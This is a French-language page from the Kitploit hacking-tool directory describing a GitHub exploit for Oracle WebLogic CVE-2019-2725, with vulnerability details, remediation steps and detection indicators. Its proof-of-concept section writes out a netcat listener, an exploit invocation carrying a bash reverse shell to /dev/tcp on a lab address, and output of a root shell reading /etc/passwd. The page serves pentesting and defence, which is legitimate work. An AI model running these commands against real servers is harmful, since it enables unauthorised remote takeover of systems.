Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Oracle-Weblogic-Server-AsyncResponseService-Deserialization-Remote-Code-Execution-CVE-2019-2725 — Exploit d'exécution de code à distance non authentifié pour Oracle WebLogic Server (CVE-2019-2725) via désérialisation dans AsyncResponseService, livrant un shell inversé via des requêtes SOAP conçues. | Kitploit
Outils/GitHubGitHub/loursha/oracle-weblogic-server-asyncresponseservice-deserialization-remote-code-execution-cve-2019-2725
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionRed TeamingOutil d'Accès à Distance
GitHubloursha/oracle-weblogic-server-asyncresponseservice-deserialization-remote-code-execution-cve-2019-2725

Oracle-Weblogic-Server-AsyncResponseService-Deserialization-Remote-Code-Execution-CVE-2019-2725

Exploit d'exécution de code à distance non authentifié pour Oracle WebLogic Server (CVE-2019-2725) via désérialisation dans AsyncResponseService, livrant un shell inversé via des requêtes SOAP conçues.

Voir le dépôt
2il y a 7 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2019-2725 – Exécution de code à distance non authentifiée dans Oracle WebLogic

Vulnérabilité dans le composant Oracle WebLogic Server d'Oracle Fusion Middleware (sous-composant : Web Services). Les versions prises en charge qui sont affectées sont 10.3.6.0.0 et 12.1.3.0.0. Une vulnérabilité facilement exploitable permet à un attaquant non authentifié ayant un accès réseau via HTTP de compromettre Oracle WebLogic Server.

Présentation de la vulnérabilité

ID CVE : CVE-2019-2725
Sévérité : Critique (CVSS v3 : 9.8)
Type de vulnérabilité : Exécution de code à distance non authentifiée (RCE)
Produit affecté : Oracle WebLogic Server
Composant affecté : AsyncResponseService
Authentification requise : Non
Interaction utilisateur requise : Non

CVE-2019-2725 est une vulnérabilité critique de désérialisation dans Oracle WebLogic Server qui permet à des attaquants distants non authentifiés d'exécuter des commandes système arbitraires via une requête SOAP spécialement conçue envoyée au point de terminaison /_async/AsyncResponseService.


Versions affectées

Versions d'Oracle WebLogic Server antérieures à la mise à jour critique d'avril 2019, y compris, mais sans s'y limiter :

  • WebLogic 10.3.6
  • WebLogic 12.1.3
  • WebLogic 12.2.1.3

Description de la vulnérabilité

La vulnérabilité existe en raison d'une désérialisation non sécurisée dans AsyncResponseService.
Un attaquant peut envoyer une charge utile XML malveillante qui entraîne l'exécution de commandes arbitraires sur le système d'exploitation sous-jacent sans authentification.

Ce problème est particulièrement dangereux car :

  • Le point de terminaison est souvent exposé en externe
  • Aucun identifiant valide n'est requis
  • L'exploitation mène directement à une compromission totale du système

Scénario d'attaque

  1. L'attaquant identifie une instance WebLogic exposée
  2. L'attaquant envoie une requête SOAP malveillante à :
  3. WebLogic désérialise les données contrôlées par l'attaquant
  4. Des commandes système arbitraires sont exécutées
  5. L'attaquant obtient un accès shell distant

Preuve de concept (PoC)

🔹 Écouteur de l'attaquant (deuxième CLI)

Démarrez un écouteur Netcat pour recevoir le shell inversé :

root@kitploit:~
nc -lvp 2323

🔹 Exécution de l'exploit (premier CLI)

Exécutez le script d'exploit contre le serveur WebLogic vulnérable :

root@kitploit:~
python3 CVE-2019-2725.py http://172.17.0.6:7001/_async/AsyncResponseService '/bin/bash -i >& /dev/tcp/172.17.0.10/2323 0>&1'

Sortie attendue :

root@kitploit:~
[+] Target appears VULNERABLE
[*] Sending payload...
[+] Payload delivered successfully (HTTP 202)

🔹 Résultat de l'exploitation réussie

Sur l'écouteur Netcat, un shell inversé est reçu :

root@kitploit:~
Listening on 0.0.0.0 2323
Connection received on 172.17.0.6 39926
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#

root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain# whoami
root
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#

root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain# pwd
/root/Oracle/Middleware/user_projects/domains/base_domain
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#

root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/bin:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#

Atténuation et remédiation

Actions recommandées

  1. Appliquer la mise à jour critique Oracle d'avril 2019 (CPU)
  • Mettez à niveau Oracle WebLogic Server vers une version incluant les correctifs de sécurité d'avril 2019 fournis par Oracle https://www.oracle.com/security-alerts/alert-cve-2019-2725.html
  1. Restreindre l'accès au point de terminaison vulnérable
  • Cela confirme l'exécution de commandes à distance et l'accès au niveau système.
  • Assurez-vous que ce point de terminaison n'est pas exposé aux réseaux non fiables.
  • Restreignez l'accès aux plages d'adresses IP internes ou de confiance uniquement.
  1. Bloquer les accès non fiables à l'aide de contrôles réseau
  • Implémentez des règles de pare-feu strictes
  • Appliquez le contrôle d'accès via des reverse proxies
  • Désactivez tout accès externe inutile aux services de gestion et asynchrones de WebLogic
  1. Activer la journalisation et la surveillance continue
  • Surveillez les journaux d'accès HTTP
  • Déclenchez des alertes sur les modèles de requêtes anormaux ciblant les points de terminaison asynchrones

Indicateurs de détection

Les indicateurs suivants peuvent suggérer une tentative ou une exploitation réussie :

🔍 Indicateurs réseau et applicatifs

  • Requêtes vers :
  • Charges utiles SOAP/XML suspectes ou malformées
  • Réponses HTTP 202 Accepted répétées de la part des services asynchrones

🔍 Indicateurs basés sur l'hôte

  • Connexions réseau sortantes initiées par WebLogic Server
  • Exécution de shell inattendue, par exemple :
  • /bin/bash
  • /bin/sh
  • Création de connexions shell inversées vers des adresses IP ou des ports inconnus

Recommandations de surveillance de la sécurité

  • Activez les signatures IDS/IPS pour les modèles d'exploitation SOAP WebLogic connus
  • Surveillez le trafic sortant des serveurs WebLogic
  • Implémentez l'exécution avec privilèges minimaux pour les services applicatifs
  • Examinez régulièrement les journaux d'exécution des processus WebLogic

Crédits

Les référentiels publics suivants ont été référencés pour la compréhension et la validation de l'exploit :

  • https://github.com/lufeirider/CVE-2019-2725
  • https://github.com/pimps/CVE-2019-2725

Télécharger l’outil